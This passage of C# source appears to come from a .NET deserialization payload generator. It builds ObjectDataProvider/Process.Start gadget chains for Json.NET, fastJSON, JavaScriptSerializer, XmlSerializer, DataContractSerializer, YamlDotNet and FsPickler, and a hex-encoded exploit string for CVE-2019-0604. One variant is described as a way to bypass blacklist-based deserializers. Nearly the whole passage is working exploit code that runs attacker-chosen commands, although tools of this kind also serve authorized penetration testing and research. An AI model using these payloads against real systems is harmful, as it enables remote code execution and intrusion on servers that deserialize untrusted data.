                    cmdPart = "'" + inputArgs.CmdFileName + "'";
                }

                String payload = @"{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':[" + cmdPart + @"]
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
                if (inputArgs.Minify)
                {
                    if (inputArgs.UseSimpleType)
                    {
                        payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
                    }
                    else
                    {
                        payload = JSONMinifier.Minify(payload, null, null);
                    }
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.JsonNet_deserialize(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("fastjson"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
                }
                else
                {
                    cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
                }

                String payload = @"{
    ""$types"":{
        ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"",
        ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"",
        ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3""
    },
    ""$type"":""1"",
    ""ObjectInstance"":{
        ""$type"":""2"",
        ""StartInfo"":{
            ""$type"":""3"",
            " + cmdPart + @"
        }
    },
    ""MethodName"":""Start""
}";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        var instance = JSON.ToObject <Object>(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("javascriptserializer"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
                }
                else
                {
                    cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
                }

                String payload = @"{
    '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'ObjectInstance':{
        '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        'StartInfo': {
            '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            " + cmdPart + @"
        }
    }
}";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.JavaScriptSerializer_deserialize(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("xmlserializer"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                }

                String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" >
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string"">
                    <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
";

                if (inputArgs.Minify)
                {
                    payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
                }


                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.XMLSerializer_deserialize(payload, null, "root");
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("datacontractserializer2"))
            {
                // This by mixing what we had already in xmlserializer and datacontractserializer
                // this can be useful to bypass deserializers that are based on a blacklist
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                }

                String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
      <ExpandedElement z:Id=""ref1"" >
        <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
      </ExpandedElement>
        <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
            <a:MethodName>Parse</a:MethodName>
            <a:MethodParameters>
                <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
                    <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </a:MethodParameters>
            <a:ObjectInstance z:Ref=""ref1""/>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
                if (inputArgs.Minify)
                {
                    payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("datacontractserializer"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType>
          <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
                }
                else
                {
                    cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
                }

                String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
    <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" 
                                                         xmlns:c=""http://www.w3.org/2001/XMLSchema""
                                                         xmlns:i=""http://www.w3.org/2001/XMLSchema-instance""
                                                         xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""
                                                         >
      <ExpandedElement z:Id=""ref1"" >
        <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
      </ExpandedElement>
      <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
        <a:MethodName>Start</a:MethodName>
        <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
          " + cmdPart + @"
        </a:MethodParameters>
        <a:ObjectInstance z:Ref=""ref1""/>
      </ProjectedProperty0>
    </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</root>
";
                if (inputArgs.Minify)
                {
                    payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("yamldotnet"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"FileName: " + inputArgs.CmdFileName + @",
					Arguments: "                     + inputArgs.CmdArguments;
                }
                else
                {
                    cmdPart = $@"FileName: " + inputArgs.CmdFileName;
                }

                String payload = @"
!<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> {
    MethodName: Start,
	ObjectInstance: 
		!<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
			StartInfo:
				!<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
					"                     + cmdPart + @"

                }
        }
}";

                if (inputArgs.Minify)
                {
                    payload = YamlDocumentMinifier.Minify(payload);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        SerializersHelper.YamlDotNet_deserialize(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else if (formatter.ToLower().Equals("fspickler"))
            {
                inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

                String cmdPart;

                if (inputArgs.HasArguments)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
                }

                String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";

                internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload);

                String payload = @"{
  ""FsPickler"": ""4.0.0"",
  ""type"": ""System.Object"",
  ""value"": {
          ""_flags"": ""subtype"",
          ""subtype"": {
            ""Case"": ""NamedType"",
            ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"",
            ""Assembly"": {
              ""Name"": ""Microsoft.PowerShell.Editor"",
              ""Version"": ""3.0.0.0"",
              ""Culture"": ""neutral"",
              ""PublicKeyToken"": ""31bf3856ad364e35""
            }
          },
          ""instance"": {
            ""serializationEntries"": [
              {
                ""Name"": ""ForegroundBrush"",
                ""Type"": {
                  ""Case"": ""NamedType"",
                  ""Name"": ""System.String"",
                  ""Assembly"": {
                    ""Name"": ""mscorlib"",
                    ""Version"": ""4.0.0.0"",
                    ""Culture"": ""neutral"",
                    ""PublicKeyToken"": ""b77a5c561934e089""
                  }
                },
                ""Value"": """ + internalPayload + @"""
              }
            ]
          }
    }
  }";

                if (inputArgs.Minify)
                {
                    payload = JSONMinifier.Minify(payload, null, null);
                }

                if (inputArgs.Test)
                {
                    try
                    {
                        var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
                        serializer.UnPickleOfString <Object>(payload);
                    }
                    catch
                    {
                    }
                }
                return(payload);
            }
            else
            {
                throw new Exception("Formatter not supported");
            }
        }
        /// <summary>
        /// Builds the serialized string for the CVE-2019-0604 gadget from the instance
        /// fields <c>cmd</c> and <c>useurl</c>. The result is a fixed <c>__bp</c> prefix,
        /// a hex-encoded length-derived <see cref="char"/>, and the hex-encoded payload,
        /// where the payload is an assembly-qualified type name followed by a colon and
        /// the minified DataContract XML body.
        /// </summary>
        /// <returns>The hex-encoded payload string, prefixed with <c>__bp</c>.</returns>
        /// <exception cref="OverflowException">
        /// Thrown by the <c>checked</c> conversion when <c>payload.Length &lt;&lt; 2</c> does
        /// not fit in a <see cref="char"/>, i.e. when the payload is longer than 16383 characters.
        /// </exception>
        /// <remarks>
        /// Depends on <c>InputArgs</c>, <c>TextFormattingRunPropertiesGenerator</c>,
        /// <c>CommandArgSplitter</c>, <c>XMLMinifier</c> and the <c>HexEncode</c> overloads,
        /// none of which are defined in this method; exceptions from those callees are not caught here.
        /// </remarks>
        public string CVE_2019_0604()
        {
            /*
             * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
             * <ExpandedElement/>
             * <ProjectedProperty0>
             * <MethodName>Parse</MethodName>
             * <MethodParameters>
             *  <anyType xsi:type=""xsd:string"">
             *      <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
             *  </anyType>
             * </MethodParameters>
             * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
             * </ProjectedProperty0>
             * </ExpandedWrapperOfXamlReaderObjectDataProvider>";
             * //*/

            // payloadPart1: the type name (with trailing ':'); payloadPart2: the XML body.
            string payloadPart1 = "";
            string payloadPart2 = "";

            if (useurl)
            {
                // URL mode: delegate body generation to TextFormattingRunPropertiesGenerator.
                // Cmd is set to a literal placeholder; the URL in `cmd` is passed through
                // the internal "--xamlurl" argument instead. Presumably the generator treats
                // Cmd as unused in this variant — verify against that generator.
                InputArgs inputArgs = new InputArgs();
                inputArgs.Cmd      = "foobar";
                inputArgs.IsRawCmd = true;
                inputArgs.ExtraInternalArguments = new List <String> {
                    "--variant", "3", "--xamlurl", cmd
                };
                inputArgs.Minify        = true;
                inputArgs.UseSimpleType = true;

                // Type name comes from reflection here (unlike the hard-coded literal in the
                // other branch); spaces are stripped so the two branches produce the same shape.
                payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
                payloadPart1 = payloadPart1.Replace(" ", "");
                TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator();
                payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs);
            }
            else
            {
                // Command mode: hard-coded ExpandedWrapper`2 type name, body assembled inline.
                payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";

                // Split `cmd` into file name and (optional) arguments using XML escaping rules;
                // splittedCMD[1] is only read when hasArgs is true.
                Boolean  hasArgs;
                string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);

                String cmdPart;

                if (hasArgs)
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
                }
                else
                {
                    cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
                }

                payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
            }
            //payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding

            // Minified in both branches, even though the URL branch already requested
            // Minify = true on its InputArgs; the hex encoding below doubles the size.
            payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true);

            //Console.WriteLine(payloadPart2);
            string payload = payloadPart1 + payloadPart2;

            // NOTE(review): writes the un-encoded payload to stdout before encoding; this looks
            // like leftover debug output (the neighbouring WriteLine is commented out) and will
            // interleave with the returned value when the caller also prints to stdout.
            Console.WriteLine(payload);
            StringBuilder stringBuilder = new StringBuilder();

            // Output layout: "__bp" + hex(length-derived char) + hex(payload).
            // The checked cast throws OverflowException once payload.Length << 2 exceeds
            // char.MaxValue (payload longer than 16383 chars) rather than silently truncating.
            // Presumably the shifted length mirrors the consumer's own length encoding — verify.
            stringBuilder.Append("__bp");
            HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
            HexEncode(payload, stringBuilder);

            return(stringBuilder.ToString());
        }